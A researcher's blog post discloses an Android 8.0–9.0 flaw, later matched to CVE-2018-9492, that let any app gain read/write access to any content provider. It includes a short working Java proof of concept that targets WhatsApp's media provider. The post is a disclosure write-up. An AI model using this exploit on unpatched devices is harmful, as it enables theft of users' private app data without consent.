Global grant uri in Android 8.0-9.0 (2018 year)

Any thirdparty application was able to grant read/write access to any exported/non exported, secured by permissions content providers which were installed in system. It did't matter if content provider defined in AndroidManifest with grantUriPermission flag or not, if it was exported or no. Thirdparty were able to access any content provider in system without user interaction.

Uri uri =Uri.parse("content://com.whatsapp.provider.media/item/5");
Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(getPackageName(), MainActivity.class.getName());
intent.addFlags(Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
intent.putExtra(Intent.EXTRA_STREAM, uri);
intent.setType("*/*");
startActivity(intent);

And that's all :) When you launch that code on vulnerable Android your app receives access to passed "uri" value. You can opened any content providers in system!

PoC demo:


This funny bug was reported in 30.08.2018. 
And than
The Android Security Team believes that this is a duplicate of a report previously submitted by another external researcher on July 26, 2018.

So, for me it was duplicate.
Original bug information is next:

  • CVE-2018-9492
  • Author: MichaƂ Bednarski 

Popular posts from this blog

Facebook Messenger server random memory exposure through corrupted GIF image

React debug.keystore key was trusted by Meta(Facebook) which caused to Instagram account takeover by malicious apps.

Meta Quest: Attacker could make any Oculus user to follow (subscribe) him without any approval